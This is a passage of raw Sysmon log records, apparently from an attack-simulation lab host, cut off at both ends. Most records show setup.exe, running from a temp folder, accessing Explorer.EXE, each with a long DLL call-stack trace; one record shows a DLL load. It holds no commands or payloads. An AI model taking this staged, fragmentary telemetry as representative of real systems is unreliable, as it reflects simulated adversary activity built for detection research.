l+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000015432Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.552{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 11241100x800000000000000015431Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:52.552{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Program Files\Mozilla Firefox\ucrtbase.dll2021-01-18 13:59:52.552 10341000x800000000000000015430Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.552{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015429Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.552{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015428Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.552{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015427Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.552{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015426Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.552{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015425Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.552{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015424Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.552{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000015423Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.552{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015422Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.552{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015421Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.552{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015420Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.552{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015419Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.552{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000015418Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.552{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015417Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.552{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015416Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.552{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015415Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.552{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000015414Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
